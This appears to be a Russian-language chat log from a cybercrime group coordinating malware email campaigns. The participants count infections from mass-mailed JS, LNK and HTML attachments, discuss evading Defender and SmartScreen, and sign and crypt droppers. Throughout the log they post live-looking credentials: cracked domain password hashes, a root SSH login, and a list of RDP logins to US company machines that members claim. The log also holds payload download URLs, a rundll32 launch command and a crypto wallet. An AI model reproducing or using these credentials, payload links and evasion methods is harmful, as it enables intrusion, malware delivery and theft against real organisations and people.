[2024-01-26 03:34:47] @usernamenn:matrix.bestflowers247.online: https://stresse.io/
--------------------
[2024-01-26 06:18:02] @lapa:matrix.bestflowers247.online: короч в js и в lnk у него сабсик на exe
--------------------
[2024-01-26 06:18:03] @lapa:matrix.bestflowers247.online: Trojan:Win32/Sabsik.FL.A!ml
--------------------
[2024-01-26 06:18:38] @lapa:matrix.bestflowers247.online: при запуске lnk предупреждение вылетает, его не убрать, так как подписывать лнк нельзя
--------------------
[2024-01-26 08:13:13] @sunortla:matrix.bestflowers247.online: Пишет это сообщение не удалось разшифровать
--------------------
[2024-01-26 08:13:15] @sunortla:matrix.bestflowers247.online: Привет
--------------------
[2024-01-26 08:13:28] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-26 08:14:54] @usernamegg:matrix.bestflowers247.online: ```
[11:06:53] private - coder: доброе утро. всю ночь одну тему еще крутил по исследованиям, поэтому как ты просил скидываю сразу в офлайн чтобы ты меня не ждал завтра. 4254354325452342435
[11:06:53] private - coder: 4254354325452342435 пароль
[11:06:53] private - coder: Download: https://qaz.im/load/EFBsaf/d6642579-f8fa-487f-955f-009cb36ebe4c
Delete: https://qaz.im/index.php?a=delete&q=d6642579-f8fa-487f-955f-009cb36ebe4c
[11:06:53] private - coder: ссылки что ты говорил и Италия максимально постарался перевод сделать хорошим через нейросеть и сверялся по другим переводчикам
[11:06:53] private - coder: если увидишь что идут патти хорошо можешь если что своим файлом заменить. хотя ты говорил вроде как лоудер еще не готов, но все же
[11:06:53] private - coder: у меня еще есть идеи по улучшению, но только если ты дашь добро - скажешь надо. Просто смотри, сейчас чтобы юзера заразить действий итак дохуя надо, а тут 3 клика мышью (да, довольно кажется сложным, но мне кажется не очень), но при этом тут тебе сразу куча обходов: MOTW (скачивание из сети), SmartScreen, WinDef и прочее и все легитимно и проживет долго метод. поэтому либо это исторический шаг или я просто блин зря все старался
[11:06:53] private - coder: но тот что я до этого находил с экселем там вообще без вариантов, круто выглядело изначально., но по факту бесполезная шняга(
[11:06:53] private - coder: ну и я постоянно в исследованиях, если чото новое найдется то сразу разумеется к тебе
```
--------------------
[2024-01-26 08:14:58] @usernamegg:matrix.bestflowers247.online: под путти он собрал
--------------------
[2024-01-26 08:16:00] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 08:19:05] @lapa:matrix.bestflowers247.online: аа, хотя я проверял же не с путти
--------------------
[2024-01-26 08:19:13] @lapa:matrix.bestflowers247.online: а от квака exe палит
--------------------
[2024-01-26 08:19:27] @usernamegg:matrix.bestflowers247.online: дак нам квака то не нужно слать
--------------------
[2024-01-26 08:19:29] @usernamegg:matrix.bestflowers247.online: по италии
--------------------
[2024-01-26 08:19:29] @lapa:matrix.bestflowers247.online: он с линками старыми собрал
--------------------
[2024-01-26 08:19:36] @usernamegg:matrix.bestflowers247.online: ъмы же тест делаем
--------------------
[2024-01-26 08:19:42] @sunortla:matrix.bestflowers247.online: А кто в этом чате сидит?
--------------------
[2024-01-26 08:20:04] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 08:20:07] @lapa:matrix.bestflowers247.online: да я понял
--------------------
[2024-01-26 08:20:11] @sunortla:matrix.bestflowers247.online: 2 криптора и клиенты?
--------------------
[2024-01-26 08:20:33] @usernamegg:matrix.bestflowers247.online: 2 криптера Бурито и Бентли и вся моя команда
--------------------
[2024-01-26 08:20:54] @sunortla:matrix.bestflowers247.online: А с бурито можно общаться?
--------------------
[2024-01-26 08:22:56] @lapa:matrix.bestflowers247.online: скоро проверю html
--------------------
[2024-01-26 08:23:00] @lapa:matrix.bestflowers247.online: и пущу по италии
--------------------
[2024-01-26 08:23:10] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 08:23:12] @usernamegg:matrix.bestflowers247.online: общайся
--------------------
[2024-01-26 08:23:18] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 08:23:21] @sunortla:matrix.bestflowers247.online: Еще мне нужна твоя жаба, как резервная связь
--------------------
[2024-01-26 08:23:42] @lapa:matrix.bestflowers247.online: все ок
--------------------
[2024-01-26 08:23:45] @lapa:matrix.bestflowers247.online: путти запускается
--------------------
[2024-01-26 08:23:56] @usernamegg:matrix.bestflowers247.online: WKuLrh@thesecure.biz
--------------------
[2024-01-26 08:25:17] @sunortla:matrix.bestflowers247.online: Команда из кого состоит, ну по мимо крипторов?
--------------------
[2024-01-26 08:25:29] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 08:25:39] @sunortla:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> WKuLrh@thesecure.biz

Отправил
--------------------
[2024-01-26 08:27:22] @lapa:matrix.bestflowers247.online: запустился
--------------------
[2024-01-26 08:31:44] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 08:31:56] @lapa:matrix.bestflowers247.online: 100k прошлю
--------------------
[2024-01-26 08:34:53] @lapa:matrix.bestflowers247.online: что-то тишина
--------------------
[2024-01-26 08:35:11] @lapa:matrix.bestflowers247.online: 44к ушло
--------------------
[2024-01-26 08:35:17] @lapa:matrix.bestflowers247.online: вот есть один запуск из италии
--------------------
[2024-01-26 08:35:37] @lapa:matrix.bestflowers247.online: а хотя у них рано еще
--------------------
[2024-01-26 08:35:53] @usernamegg:matrix.bestflowers247.online: запуск ?
--------------------
[2024-01-26 08:36:06] @usernamegg:matrix.bestflowers247.online: аттачем поставил ?
--------------------
[2024-01-26 08:36:06] @lapa:matrix.bestflowers247.online: да, 1 запуск из италии есть
--------------------
[2024-01-26 08:36:14] @lapa:matrix.bestflowers247.online: да, атачем шлю
--------------------
[2024-01-26 08:36:26] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2024-01-26 08:38:10] @lapa:matrix.bestflowers247.online: с учетом того, что я шлю по новым письмам
--------------------
[2024-01-26 08:38:18] @lapa:matrix.bestflowers247.online: которые за месяц выкачивались
--------------------
[2024-01-26 08:38:20] @lapa:matrix.bestflowers247.online: слабо как-то
--------------------
[2024-01-26 08:38:28] @lapa:matrix.bestflowers247.online: обычно сразу италия идет
--------------------
[2024-01-26 08:39:03] @lapa:matrix.bestflowers247.online: все же думаю, они там не хотят выпонять инструкцию эту
--------------------
[2024-01-26 08:39:51] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 08:39:54] @usernamegg:matrix.bestflowers247.online: все верно
--------------------
[2024-01-26 08:40:26] @lapa:matrix.bestflowers247.online: ща еще попробую слать атачем html в зипе
--------------------
[2024-01-26 08:40:41] @lapa:matrix.bestflowers247.online: так как думаю, там еще html может открываться в отдельном окне
--------------------
[2024-01-26 08:40:48] @lapa:matrix.bestflowers247.online: и тогда вообще там js не сработает
--------------------
[2024-01-26 08:41:05] @lapa:matrix.bestflowers247.online: 75к ушло
--------------------
[2024-01-26 08:41:07] @lapa:matrix.bestflowers247.online: 1 запуск только
--------------------
[2024-01-26 08:42:14] @lapa:matrix.bestflowers247.online: 2 запуска из италии
--------------------
[2024-01-26 08:43:02] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 08:44:29] @lapa:matrix.bestflowers247.online: запустился зипами
--------------------
[2024-01-26 08:45:39] @lapa:matrix.bestflowers247.online: ну слабо на самом деле
--------------------
[2024-01-26 08:45:43] @lapa:matrix.bestflowers247.online: и
--------------------
[2024-01-26 08:45:53] @lapa:matrix.bestflowers247.online: и это я не по компания даже прослал 75к
--------------------
[2024-01-26 08:47:42] @lapa:matrix.bestflowers247.online: зипами тоже прошлю 75к
--------------------
[2024-01-26 08:53:49] @usernamehunter:matrix.bestflowers247.online: привет
--------------------
[2024-01-26 08:54:00] @usernamehunter:matrix.bestflowers247.online: бро, по деньгам закроемся?
--------------------
[2024-01-26 08:54:09] @usernamehunter:matrix.bestflowers247.online: кош bc1qrju3nqrn0x3meepsthug7r67kuccdp8506t2cq

--------------------
[2024-01-26 08:54:19] @usernamegg:matrix.bestflowers247.online: а что там разве что то есть ?
--------------------
[2024-01-26 08:54:34] @usernamegg:matrix.bestflowers247.online: сря ты поставил такую же аватарку
--------------------
[2024-01-26 08:54:39] @usernamegg:matrix.bestflowers247.online: как и в токсе
--------------------
[2024-01-26 08:54:53] @usernamegg:matrix.bestflowers247.online: бентли же знает ее
--------------------
[2024-01-26 08:54:54] @usernamehunter:matrix.bestflowers247.online: дак да NN то что кидал в праздники
--------------------
[2024-01-26 08:55:08] @usernamegg:matrix.bestflowers247.online: а что там он кидал ?
--------------------
[2024-01-26 08:55:28] @sunortla:matrix.bestflowers247.online: Я думаю он и так все знает
--------------------
[2024-01-26 08:55:42] @sunortla:matrix.bestflowers247.online: Он бы не стал просто так брать и меня удалять сразу везде
--------------------
[2024-01-26 08:55:45] @usernamehunter:matrix.bestflowers247.online: дак много всего было )
--------------------
[2024-01-26 08:55:56] @usernamehunter:matrix.bestflowers247.online: по истории глянь плз
--------------------
[2024-01-26 08:57:06] @usernamegg:matrix.bestflowers247.online: тогда не удаляй аватарку это глупо
--------------------
[2024-01-26 08:57:16] @sunortla:matrix.bestflowers247.online: хахаха
--------------------
[2024-01-26 08:57:51] @usernamehunter:matrix.bestflowers247.online: 1350
--------------------
[2024-01-26 08:59:17] @sunortla:matrix.bestflowers247.online: Какой смысл прятаться, он уже сжег мосты и поставил точку
--------------------
[2024-01-26 08:59:22] @usernamegg:matrix.bestflowers247.online: скоро гляну
--------------------
[2024-01-26 08:59:27] @usernamegg:matrix.bestflowers247.online: более подробный отчет
--------------------
[2024-01-26 08:59:34] @usernamehunter:matrix.bestflowers247.online: +
--------------------
[2024-01-26 08:59:34] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 09:01:53] @lapa:matrix.bestflowers247.online: короче 150 к ушло 8 запусков из италии
--------------------
[2024-01-26 09:02:10] @lapa:matrix.bestflowers247.online: посмотрим сколько к вечеру будет
--------------------
[2024-01-26 09:03:33] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-26 09:03:39] @usernamegg:matrix.bestflowers247.online: там с путти ведь
--------------------
[2024-01-26 09:03:42] @usernamegg:matrix.bestflowers247.online: все верно ?
--------------------
[2024-01-26 09:05:29] @lapa:matrix.bestflowers247.online: да, путти на выдаче
--------------------
[2024-01-26 09:05:57] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-26 09:06:23] @usernamegg:matrix.bestflowers247.online: можешь выдать dll ?
--------------------
[2024-01-26 09:06:30] @usernamegg:matrix.bestflowers247.online: обновленный
--------------------
[2024-01-26 09:06:32] @sunortla:matrix.bestflowers247.online: Я и ник свой настоящий напишу)
--------------------
[2024-01-26 09:06:41] @usernamegg:matrix.bestflowers247.online: я запрошу dll у квака
--------------------
[2024-01-26 09:06:49] @sunortla:matrix.bestflowers247.online: Не против?
--------------------
[2024-01-26 09:07:28] @usernamegg:matrix.bestflowers247.online: что бы сделать нагруку и прослать точечно по двум трем конторам и еще сам соберу почты и докину тебе
--------------------
[2024-01-26 09:07:36] @chuck:talks.icu: привет
--------------------
[2024-01-26 09:07:37] @chuck:talks.icu: на точки?
--------------------
[2024-01-26 09:08:08] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 09:08:12] @usernamegg:matrix.bestflowers247.online: точно на точки твой софт
--------------------
[2024-01-26 09:08:16] @lapa:matrix.bestflowers247.online: лучше exe
--------------------
[2024-01-26 09:08:22] @usernamegg:matrix.bestflowers247.online: я не буду его массово слать
--------------------
[2024-01-26 09:08:25] @lapa:matrix.bestflowers247.online: с ним попробуем
--------------------
[2024-01-26 09:08:28] @lapa:matrix.bestflowers247.online: а что будет слать?
--------------------
[2024-01-26 09:08:31] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 09:08:32] @lapa:matrix.bestflowers247.online: * а что будем слать?
--------------------
[2024-01-26 09:08:46] @usernamegg:matrix.bestflowers247.online: лучше ехе конечно
--------------------
[2024-01-26 09:09:28] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-26 в 12.09.23.png
--------------------
[2024-01-26 09:09:34] @usernamegg:matrix.bestflowers247.online: вот от него файлы
--------------------
[2024-01-26 09:09:42] @usernamegg:matrix.bestflowers247.online: который у тебя сабсик показало
--------------------
[2024-01-26 09:10:23] @chuck:talks.icu: понял
--------------------
[2024-01-26 09:10:33] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 09:10:33] @chuck:talks.icu: там вчера от тебя пришло несколько ботов
--------------------
[2024-01-26 09:10:41] @chuck:talks.icu: хз песок это или нет
--------------------
[2024-01-26 09:10:42] @lapa:matrix.bestflowers247.online: я новые линки сделаю
--------------------
[2024-01-26 09:10:43] @chuck:talks.icu: смотрел?
--------------------
[2024-01-26 09:10:45] @sunortla:matrix.bestflowers247.online: А теперь вангую он тебе напишет
--------------------
[2024-01-26 09:11:06] @lapa:matrix.bestflowers247.online: js пусть сделает
--------------------
[2024-01-26 09:11:06] @lapa:matrix.bestflowers247.online: 1к
--------------------
[2024-01-26 09:11:07] @chuck:talks.icu: похоже всетаки песок
--------------------
[2024-01-26 09:11:10] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 09:11:10] @chuck:talks.icu: пустой десктоп
--------------------
[2024-01-26 09:11:17] @lapa:matrix.bestflowers247.online: и без зипа пусть выдает
--------------------
[2024-01-26 09:11:24] @lapa:matrix.bestflowers247.online: так как я их еще подписывать буду
--------------------
[2024-01-26 09:11:25] @usernamegg:matrix.bestflowers247.online: один
--------------------
[2024-01-26 09:11:29] @usernamegg:matrix.bestflowers247.online: взял сейчас
--------------------
[2024-01-26 09:11:31] @usernamegg:matrix.bestflowers247.online: смотрю
--------------------
[2024-01-26 09:11:39] @lapa:matrix.bestflowers247.online: 13 запусков с италии
--------------------
[2024-01-26 09:11:45] @usernamegg:matrix.bestflowers247.online: да мне десктопы пустые не по душе
--------------------
[2024-01-26 09:12:00] @usernamegg:matrix.bestflowers247.online: инжект жду
--------------------
[2024-01-26 09:12:58] @sunortla:matrix.bestflowers247.online: А ты мне пока расскажи, ты говорил твои парни ковыряли моё инфецирование.
Что они сказали про это?
--------------------
[2024-01-26 09:13:08] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 09:13:13] @usernamemm:matrix.bestflowers247.online: all.mail.txt
--------------------
[2024-01-26 09:17:34] @lapa:matrix.bestflowers247.online: https://amacey.com/x1g/{random}
https://terensfood.com/61XblXm/{random}
https://terripost.com/ftxK/{random}
--------------------
[2024-01-26 09:17:45] @lapa:matrix.bestflowers247.online: вот с этими js пусть сделает 1к
--------------------
[2024-01-26 09:20:45] @usernamezz:matrix.bestflowers247.online: `$DCC2$10240#serviceacct#ef3918882b4b96a3c09a80b60cc21c54`
--------------------
[2024-01-26 09:21:28] @usernamezz:matrix.bestflowers247.online: + хеш этот же пасс 3254edbb063e8cc08724354801e6332e
--------------------
[2024-01-26 09:22:17] @usernameboy:matrix.bestflowers247.online: 3254edbb063e8cc08724354801e6332e:Service2019!

--------------------
[2024-01-26 09:22:28] @usernamezz:matrix.bestflowers247.online: +
--------------------
[2024-01-26 09:27:02] @sunortla:matrix.bestflowers247.online: Я отойду, через пару часов буду
--------------------
[2024-01-26 09:27:28] @sunortla:matrix.bestflowers247.online: Думаю это не страшно, если пропущу файл, то его сделает кто нибудь другой
--------------------
[2024-01-26 09:27:41] @sunortla:matrix.bestflowers247.online: Там все равно плата за 1 файл
--------------------
[2024-01-26 09:32:39] @usernameyy:matrix.bestflowers247.online: Установка прокси, билд прокси и прочего:
http://95.216.224.244/
```
basic:
CHbI94Dz7HyFMYcZugtCMYni7UzOFv2uX
|%wDh3mmT*8*uMFt6DtLIv(0skr[L8tCY
--------------------
[2024-01-26 09:33:02] @usernameyy:matrix.bestflowers247.online: затестил установку соксов здесь
proxychains ssh root@170.130.165.89
root
PASS: 8DiYEpiS!zbXLdKFbVx&s
--------------------
[2024-01-26 09:33:13] @usernameyy:matrix.bestflowers247.online: 170.130.165.89:81
--------------------
[2024-01-26 09:33:21] @usernameyy:matrix.bestflowers247.online: * http://170.130.165.89:81
--------------------
[2024-01-26 09:55:20] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 09:55:58] @usernamegg:matrix.bestflowers247.online: сколько по италии уже запусков ?
--------------------
[2024-01-26 09:56:10] @usernamegg:matrix.bestflowers247.online: ну что будет ехе ?
--------------------
[2024-01-26 09:56:46] @lapa:matrix.bestflowers247.online: 22 запуска
--------------------
[2024-01-26 09:57:16] @lapa:matrix.bestflowers247.online: ну маловато, для 150к писем
--------------------
[2024-01-26 09:58:18] @lapa:matrix.bestflowers247.online: но еще попробуем потом в пн в боевом режиме прослать его html тоже по европе
--------------------
[2024-01-26 10:00:23] @chuck:talks.icu: погодь, надо суперноды сделать
--------------------
[2024-01-26 10:00:39] @chuck:talks.icu: вручную щас делаю
--------------------
[2024-01-26 10:00:40] @chuck:talks.icu: там две запалились
--------------------
[2024-01-26 10:00:44] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2024-01-26 10:00:45] @chuck:talks.icu: свежих надо
--------------------
[2024-01-26 10:00:56] @usernamegg:matrix.bestflowers247.online: у меня есть германия сетка которую надо востановить
--------------------
[2024-01-26 10:06:33] @chuck:talks.icu: аа это ты по старым проходишь
--------------------
[2024-01-26 10:07:10] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 10:07:13] @usernamegg:matrix.bestflowers247.online: по кому креды есть
--------------------
[2024-01-26 10:07:15] @usernamegg:matrix.bestflowers247.online: кто ушел в офф
--------------------
[2024-01-26 10:07:29] @usernamegg:matrix.bestflowers247.online: [26 Jan 2024 10:07] BB: DONE
--------------------
[2024-01-26 10:07:34] @usernamegg:matrix.bestflowers247.online: BG-WK129326
--------------------
[2024-01-26 10:07:38] @usernamegg:matrix.bestflowers247.online: bginsurance\Karli.Forbes
--------------------
[2024-01-26 10:07:43] @usernamegg:matrix.bestflowers247.online: 600 компов сеть
--------------------
[2024-01-26 10:08:02] @chuck:talks.icu: мм
--------------------
[2024-01-26 10:08:09] @chuck:talks.icu: а я подумал песок
--------------------
[2024-01-26 10:08:17] @usernamegg:matrix.bestflowers247.online: я тоже
--------------------
[2024-01-26 10:08:22] @usernamegg:matrix.bestflowers247.online: но решил перепроверить
--------------------
[2024-01-26 10:09:15] @chuck:talks.icu: пустой десктоп, странно
--------------------
[2024-01-26 10:29:44] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 10:29:59] @usernamegg:matrix.bestflowers247.online: такие тачки я встрчел в сети когда по рдп заходил
--------------------
[2024-01-26 10:31:22] @chuck:talks.icu: какието урезаные чтоли
--------------------
[2024-01-26 10:33:27] @usernamegg:matrix.bestflowers247.online: все равно сомнения
--------------------
[2024-01-26 10:33:34] @usernamegg:matrix.bestflowers247.online: полезли дату сейчас смотреть
--------------------
[2024-01-26 10:33:40] @usernamegg:matrix.bestflowers247.online: там урезаннеы тачки
--------------------
[2024-01-26 10:38:35] @usernamegg:matrix.bestflowers247.online: [13:19:40] 2K24: Я тут, я собираю руками размножить не получится и рандом хеша вообще давно не спасает от детекта
и еще момент мне нужно самому упаковать тогда долго не будет детекта а если просто запаковать в нормальный zip тогда будет быстрый детект и толку от спама не будет
я могу сделать например 5-10 уникальных дроппера ты их подпишешь и я тогда это все запакую сам с твоим названием
--------------------
[2024-01-26 10:42:24] @lapa:matrix.bestflowers247.online: так пусть расскажет как именно он пакует
--------------------
[2024-01-26 10:44:24] @lapa:matrix.bestflowers247.online: а так да, могу подписать js и ему выдать для упаковки
--------------------
[2024-01-26 10:44:50] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 10:49:34] @usernamegg:matrix.bestflowers247.online: выхожу из нее
--------------------
[2024-01-26 10:49:38] @usernamegg:matrix.bestflowers247.online: ноды сделал ?
--------------------
[2024-01-26 11:03:32] @chuck:talks.icu: нет еще
--------------------
[2024-01-26 11:26:15] @usernamegg:matrix.bestflowers247.online: [14:14:06] 2K24: http://91.92.248.152/1.rar

F57RCFT57F56RKF67
--------------------
[2024-01-26 11:26:37] @usernamegg:matrix.bestflowers247.online: подпиши и выдадим ему обратно
--------------------
[2024-01-26 11:26:40] @usernamegg:matrix.bestflowers247.online: пускай упакует
--------------------
[2024-01-26 11:26:45] @chuck:talks.icu: stager_1_bmw01_x64.exe
--------------------
[2024-01-26 11:26:53] @chuck:talks.icu: готова
--------------------
[2024-01-26 11:27:02] @lapa:matrix.bestflowers247.online: отойду на час
--------------------
[2024-01-26 11:27:29] @usernamegg:matrix.bestflowers247.online: давай подпишем
--------------------
[2024-01-26 11:27:31] @usernamegg:matrix.bestflowers247.online: выдадим ему
--------------------
[2024-01-26 11:27:33] @usernamegg:matrix.bestflowers247.online: пускай пакует
--------------------
[2024-01-26 11:27:36] @usernamegg:matrix.bestflowers247.online: потом иди
--------------------
[2024-01-26 11:27:43] @usernamegg:matrix.bestflowers247.online: all.mail.txt
--------------------
[2024-01-26 11:28:01] @usernamegg:matrix.bestflowers247.online: англия по ним будем слать
--------------------
[2024-01-26 11:28:11] @usernamegg:matrix.bestflowers247.online: stager_1_bmw01_x64.exe
--------------------
[2024-01-26 11:28:13] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 11:28:18] @usernamegg:matrix.bestflowers247.online: на квака прошлем
--------------------
[2024-01-26 11:33:39] @muaddib6:matrix.org: занимаюсь
--------------------
[2024-01-26 11:34:11] @chuck:talks.icu: vehadk332372 - песок 100%
--------------------
[2024-01-26 11:34:26] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 11:34:29] @chuck:talks.icu: Velociraptor.exe в процессах и в софтах
--------------------
[2024-01-26 11:34:33] @chuck:talks.icu: зло
--------------------
[2024-01-26 11:35:51] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 11:35:54] @usernamegg:matrix.bestflowers247.online: что за софт ?
--------------------
[2024-01-26 11:36:12] @usernamegg:matrix.bestflowers247.online: vehadk332372 - песок 100%

Velociraptor.exe в процессах и в софтах
это самое зло!
--------------------
[2024-01-26 11:36:20] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 11:36:46] @usernamegg:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/nacco-industries-inc/81824112
++++73.56.75.233:3389@DESKTOPQB\user2022;user2022;United States;Boynton Beach;Florida;Good;No;Win10;19.12.23;

https://www.zoominfo.com/c/harte-hanks/31394759
++++73.56.75.233:3389@DESKTOPQB\user2022;user2022;United States;Boynton Beach;Florida;Good;No;Win10;15.01.24;

https://www.zoominfo.com/c/agilethought-llc/2132737
++++20.82.3.93:5050@SimpexVM\test;P@ssw0rd123;United States; ; ;Online;No;2024;21.01.24;

https://www.zoominfo.com/c/spok-inc/359821044
+++++154.221.31.242:3389@YISU-62B1A9385A\Administrator;1qaz2wsx;United States;Los Angeles;California;Good;Yes;2024;05.01.24;

https://www.zoominfo.com/c/capitol-federal/6701468
+++++104.34.16.226:3390@support;Pa$$w0rd;United States;Costa Mesa;California;Good;No;2024;11.01.24;

https://www.zoominfo.com/c/silverback-mdm/347945745
++++3.22.248.134:3389@EC2AMAZ-0CHAVJQ\jack;Password@1;United States;Seattle;Washington;Good;No;2023;11.12.23;

https://www.zoominfo.com/c/iteris-inc/59901406
++++24.97.190.39:63389@CALLACCT1234\fastwind;Klark120;United States;Syracuse;New York;Good;Yes;Win7;27.12.23;

https://www.zoominfo.com/c/rcm-technologies-inc/32211128
++++173.163.101.137:3389@CLINIC\memorial;memorial;United States; ; ;Good;No;2024;07.01.24;
```

--------------------
[2024-01-26 11:37:05] @usernamegg:matrix.bestflowers247.online: по некоторым пасс на винду в раб время юс там работает все ок
--------------------
[2024-01-26 11:37:30] @usernameww:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/nacco-industries-inc/81824112
++++73.56.75.233:3389@DESKTOPQB\user2022;user2022;United States;Boynton Beach;Florida;Good;No;Win10;19.12.23;
zabral
```

--------------------
[2024-01-26 11:38:04] @usernamemm:matrix.bestflowers247.online: https://www.zoominfo.com/c/harte-hanks/31394759
++++73.56.75.233:3389@DESKTOPQB\user2022;user2022;United States;Boynton Beach;Florida;Good;No;Win10;15.01.24;
забрал
--------------------
[2024-01-26 11:38:20] @usernamejj:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/capitol-federal/6701468
+++++104.34.16.226:3390@support;Pa$$w0rd;United States;Costa Mesa;California;Good;No;2024;11.01.24;
```

--------------------
[2024-01-26 11:38:41] @usernamezz:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/spok-inc/359821044
+++++154.221.31.242:3389@YISU-62B1A9385A\Administrator;1qaz2wsx;United States;Los Angeles;California;Good;Yes;2024;05.01.24;
```

--------------------
[2024-01-26 11:58:26] @lapa:matrix.bestflowers247.online: скочно отойти нужно было
--------------------
[2024-01-26 11:58:29] @lapa:matrix.bestflowers247.online: скоро подпишу
--------------------
[2024-01-26 11:59:37] @chuck:talks.icu: https://docs.velociraptor.app/
--------------------
[2024-01-26 11:59:45] @chuck:talks.icu: малваре хантеры
--------------------
[2024-01-26 12:01:16] @lapa:matrix.bestflowers247.online: аа
--------------------
[2024-01-26 12:01:21] @lapa:matrix.bestflowers247.online: он только 1 js файла выдал
--------------------
[2024-01-26 12:01:30] @lapa:matrix.bestflowers247.online: он же 10 штук хотел выдать
--------------------
[2024-01-26 12:02:38] @lapa:matrix.bestflowers247.online: Error: key status is disabled так тут серт кажется заблочили один
--------------------
[2024-01-26 12:02:42] @lapa:matrix.bestflowers247.online: другой возьму скоро
--------------------
[2024-01-26 12:05:08] @lapa:matrix.bestflowers247.online: блин, два последних серта, которые выдавали не работают
--------------------
[2024-01-26 12:07:55] @lapa:matrix.bestflowers247.online: Decrd.zip
--------------------
[2024-01-26 12:07:59] @lapa:matrix.bestflowers247.online: подписал старым сертом
--------------------
[2024-01-26 12:21:01] @usernamegg:matrix.bestflowers247.online: хуясебе
--------------------
[2024-01-26 12:21:05] @usernamegg:matrix.bestflowers247.online: охотники
--------------------
[2024-01-26 12:21:13] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2024-01-26 12:22:48] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> скочно отойти нужно было

понял, ок
--------------------
[2024-01-26 12:22:52] @usernamegg:matrix.bestflowers247.online: сейчас он запакует
--------------------
[2024-01-26 12:23:07] @usernamegg:matrix.bestflowers247.online: ехе надо дождаться от криптеров
--------------------
[2024-01-26 12:23:21] @usernamegg:matrix.bestflowers247.online: muaddib6: ну как там со стейджером ?
--------------------
[2024-01-26 12:23:39] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> muaddib6: ну как там со стейджером ?

щас будет)
--------------------
[2024-01-26 12:23:48] @usernamegg:matrix.bestflowers247.online: о давай бурито
--------------------
[2024-01-26 12:23:51] @usernamegg:matrix.bestflowers247.online: супер
--------------------
[2024-01-26 12:24:01] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 12:24:36] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> muaddib6: ну как там со стейджером ?

в процессе
--------------------
[2024-01-26 12:24:51] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 12:27:20] @lapa:matrix.bestflowers247.online: но хеш в js нельзя менять
--------------------
[2024-01-26 12:27:24] @lapa:matrix.bestflowers247.online: который я выдал
--------------------
[2024-01-26 12:27:27] @lapa:matrix.bestflowers247.online: так как подпись сразу же слетит
--------------------
[2024-01-26 12:28:09] @lapa:matrix.bestflowers247.online: вообще он должен был вадать сразу несколько js
--------------------
[2024-01-26 12:28:21] @lapa:matrix.bestflowers247.online: просто не хочется на выдачу ставить один js
--------------------
[2024-01-26 12:29:15] @burito:matrix.bestflowers247.online: что-то на обеих сертах Error: key status is disabled
--------------------
[2024-01-26 12:29:24] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-26 12:29:25] @burito:matrix.bestflowers247.online: не могу подписать
--------------------
[2024-01-26 12:29:30] @usernamegg:matrix.bestflowers247.online: не нужно
--------------------
[2024-01-26 12:29:31] @burito:matrix.bestflowers247.online: все, песда?
--------------------
[2024-01-26 12:29:33] @usernamegg:matrix.bestflowers247.online: без подписи выдай
--------------------
[2024-01-26 12:29:35] @burito:matrix.bestflowers247.online: ок
--------------------
[2024-01-26 12:29:39] @burito:matrix.bestflowers247.online: мин
--------------------
[2024-01-26 12:30:20] @burito:matrix.bestflowers247.online: rundll32.exe dll.dll,CloseMap
--------------------
[2024-01-26 12:30:20] @burito:matrix.bestflowers247.online: s.7z
--------------------
[2024-01-26 12:30:28] @usernamegg:matrix.bestflowers247.online: [15:28:16] 2K24: http://91.92.248.152/Decrd.zip
--------------------
[2024-01-26 12:30:57] @burito:matrix.bestflowers247.online: строка ехе fdbdfbdfdfdfbdfgdffdgbdf
строка длл flgjkdsfghdjkgfjdsffhgkls
--------------------
[2024-01-26 12:30:58] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-26 12:31:30] @usernamegg:matrix.bestflowers247.online: там ехе у меня
--------------------
[2024-01-26 12:31:34] @usernamegg:matrix.bestflowers247.online: > <@burito:matrix.bestflowers247.online> rundll32.exe dll.dll,CloseMap

?
--------------------
[2024-01-26 12:31:59] @burito:matrix.bestflowers247.online: а, тогда ехе там только)
--------------------
[2024-01-26 12:32:06] @burito:matrix.bestflowers247.online: длл автоматом запилися
--------------------
[2024-01-26 12:32:10] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-26 12:32:19] @usernamegg:matrix.bestflowers247.online: s.7z
--------------------
